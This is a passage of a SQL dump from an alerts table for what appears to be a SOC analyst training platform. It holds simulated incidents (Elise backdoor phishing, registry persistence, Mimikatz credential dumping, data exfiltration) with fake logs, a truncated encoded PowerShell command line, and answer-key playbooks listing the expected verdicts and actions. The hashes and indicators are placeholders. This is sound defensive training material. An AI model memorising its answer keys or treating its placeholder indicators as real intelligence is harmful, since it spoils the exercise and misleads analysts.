'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.424Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:27Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"classified_documents.zip\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"size\\\":\\\"150MB\\\"}],\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1164, 'Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting a high-ranking official in the military department. The email contained a malicious attachment named \'confidential_report.pdf.exe\' intended to deploy the Elise backdoor.', 'Initial Access', 'T1566.001 - Spear Phishing Attachment', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"email_subject\":\"Urgent: Confidential Military Report\",\"sender_email\":\"unknown@trustedgov.com\",\"recipient_email\":\"general.johnson@military.gov\",\"attachment_name\":\"confidential_report.pdf.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_family\":\"Elise\",\"smtp_server\":\"smtp.trustedgov.com\"}', '2026-02-07 21:21:11', '2026-02-23 17:39:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a well-known variant of the Elise backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"unknown@trustedgov.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email domain appears legitimate but sender is not recognized.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable disguised as a PDF, installs 
backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-08T19:00:02.428Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1165, 'Elise Backdoor Activation', 'high', 'Endpoint Detection and Response (EDR) Logs', 'Upon opening the malicious attachment, the Elise backdoor is activated, establishing a covert communication channel with Lotus Blossom\'s command and control servers. This step allows the attackers to execute further malicious actions within the compromised system.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"123456\",\"event_type\":\"process_creation\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"elise.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\elise.exe\",\"parent_process\":\"explorer.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\elise.exe\"}', '2026-02-07 21:21:11', '2026-02-23 17:40:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Lotus Blossom.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"elise.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used by Elise backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised 
host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1166, 'Persistence Mechanism Identified', 'high', 'System Registry Analysis', 'The attackers deploy persistence mechanisms by modifying registry entries, ensuring the Elise backdoor remains active even after system reboots. This step highlights the group\'s tactics in maintaining a foothold within the network.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:33:21Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.102\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value\":\"EliseBackdoor\",\"registry_data\":\"\\\"C:\\\\Program Files\\\\Elise\\\\elise.exe\\\"\",\"hash\":\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\",\"username\":\"compromised_user\"}', '2026-02-07 21:21:11', '2026-02-23 17:42:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise backdoor variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account involved in suspicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:21Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"EliseBackdoor\\\",\\\"registry_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program 
Files\\\\\\\\Elise\\\\\\\\elise.exe\\\\\\\"\\\",\\\"hash\\\":\\\"1d0f20f1c4c3e5b673d7a9a8b9c9e7f3\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1167, 'Credential Dumping Activity Detected', 'high', 'Network Traffic Analysis', 'Anomalous network traffic indicative of credential dumping was detected: the log shows Mimikatz run from 192.168.1.15 producing an LSASS memory dump (lsass_dump.dmp) while targeting 10.0.0.21. An unauthorized user is attempting to extract authentication details, likely to facilitate lateral movement within the network. Note that OS Credential Dumping (T1003) is a Credential Access technique; lateral movement is the expected follow-on activity, not what this alert itself observes, so check for subsequent logons from the compromised host using the dumped accounts.', 'Lateral Movement', 'T1003 Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:30:00Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.21\",\"external_attacker_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"action\":\"credential_dump\",\"tool\":\"mimikatz.exe\",\"hash\":\"f2c7e4c8b6a1f4a2b4d6e5a1c3d8f9b0\",\"filename\":\"lsass_dump.dmp\",\"event_description\":\"Credential Dumping detected from 192.168.1.15 using Mimikatz targeting 10.0.0.21.\"}', '2026-02-07 21:21:11', '2026-02-23 17:43:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in credential dumping.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Targeted internal IP address for credential dumping.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with APT activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2c7e4c8b6a1f4a2b4d6e5a1c3d8f9b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of Mimikatz executable used in credential 
dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"lsass_dump.dmp\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Dump file created by Mimikatz tool.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account suspected of being compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1168, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The final stage of the operation involves the exfiltration of sensitive documents related to government and military operations. The attackers use an encrypted HTTPS POST to an external upload endpoint to transfer data. Note that the DLP log records this transfer as blocked, so confirm from proxy and DLP telemetry whether any data actually left the network before treating the espionage mission as complete. This alert emphasizes the need for robust data protection measures.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-08T14:32:45Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"method\":\"POST\",\"url\":\"https://maliciousdomain.com/upload\",\"username\":\"jdoe\",\"file_exfiltrated\":\"confidential_docs.zip\",\"file_hash\":\"a6b5c18e2d3f4bcd5678efa1b23c4567\",\"session_id\":\"abc123xyz\",\"alert_id\":\"dlp-2023-001\",\"action\":\"blocked\",\"internal\":false}', '2026-02-07 21:21:11', '2026-02-23 17:44:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used for uploading exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"suspicious\",\"details\":\"Potentially sensitive file involved in 
exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a6b5c18e2d3f4bcd5678efa1b23c4567\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash of exfiltrated file associated with known data breaches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:59:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:58:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:57:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"},{\"timestamp\":\"2026-02-08T18:56:02.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-08T14:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"confidential_docs.zip\\\",\\\"file_hash\\\":\\\"a6b5c18e2d3f4bcd5678efa1b23c4567\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"alert_id\\\":\\\"dlp-2023-001\\\",\\\"action\\\":\\\"blocked\\\",\\\"internal\\\":false}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1169, 'Initial Access via COVID-19 Phishing Email', 'medium', 'Email Gateway Logs', 'A phishing email with a COVID-19 themed subject was detected. The email contained a malicious attachment intended to deceive the recipient into opening it, thereby gaining initial access to the network. This tactic is commonly associated with the Mustang Panda APT group.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"sender_email\":\"covid-alerts@healthupdate.org\",\"recipient_email\":\"j.doe@company.com\",\"subject\":\"Urgent: COVID-19 Workplace Safety Guidelines\",\"attachment\":{\"filename\":\"COVID-19_Guidelines.docx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"user\":\"jdoe\",\"email_gateway\":\"smtp.company.com\"}', '2026-02-07 21:21:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing 